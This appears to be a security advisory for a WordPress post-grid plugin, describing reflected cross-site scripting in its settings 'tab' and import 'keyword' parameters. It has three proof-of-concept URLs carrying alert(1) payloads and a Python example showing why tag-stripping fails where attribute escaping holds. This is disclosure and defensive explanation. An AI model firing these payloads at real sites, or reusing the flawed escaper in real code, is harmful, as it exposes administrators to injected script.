The slider import search feature and the tab parameter of the plugin settings are not properly sanitised before being output back into the pages, leading to Reflected Cross-Site Scripting issues.
https://example.com/wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script>

https://example.com/wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)//

v2.1.4 partially fixed the issue but still allowed arbitrary attributes to be injected, e.g.

https://example.com/wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="+accesskey=X+onclick=alert(1)//

v2.1.5 removed much of the escaping added in 2.1.4; it was restored in v2.1.8.
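Why the 2.1.4 fix was only partial: the example below, added here and not taken from the plugin's own code, models a tag-stripping escaper against an attribute-context escaper (the behaviour of WordPress' esc_attr()), renders each URL-decoded PoC value into a hidden input, and uses Python's HTML parser to see which attributes the browser would actually get. The template and the two render functions are assumptions for illustration.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample values: the PoC parameters above, URL-decoded.
PAYLOADS = {
    "tab_script_tag": '"><script>alert(1)</script>',
    "keyword_event_handler": '"onmouseover=alert(1)//',
    "tab_attr_injection_2_1_4": '" accesskey=X onclick=alert(1)//',
}

# Attributes the template itself puts on the element (hypothetical markup).
EXPECTED_ATTRS = {"type", "name", "value"}


def render_partial_fix(param: str) -> str:
    """Insufficient fix: tags are stripped, but the quote that closes the
    value attribute is left intact, so extra attributes can follow it."""
    cleaned = re.sub(r"<[^>]*>", "", param)
    return f'<input type="hidden" name="tab" value="{cleaned}">'


def render_escaped(param: str) -> str:
    """Attribute-context escaping: &, <, >, " and ' become entities, so the
    value can never terminate the attribute (what esc_attr() does)."""
    return f'<input type="hidden" name="tab" value="{html.escape(param, quote=True)}">'


class _InputAttrs(HTMLParser):
    """Collect the attributes a browser would see on the first <input>."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = dict(attrs)


def injected_attributes(markup: str) -> set:
    """Attribute names the user-controlled value managed to add."""
    p = _InputAttrs()
    p.feed(markup)
    return set(p.attrs or {}) - EXPECTED_ATTRS


def value_round_trips(markup: str, param: str) -> bool:
    """True if the whole parameter comes back as the value attribute."""
    p = _InputAttrs()
    p.feed(markup)
    return (p.attrs or {}).get("value") == param
```

With the tag-stripping version only the `<script>` payload is neutralised; the two quote-based payloads still add event-handler attributes, while the entity-escaped version keeps every payload inside the attribute value.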
0xB9
Yes
2021-06-28 (about 1 year ago)
2021-06-28 (about 1 year ago)
2022-01-02 (about 1 year ago)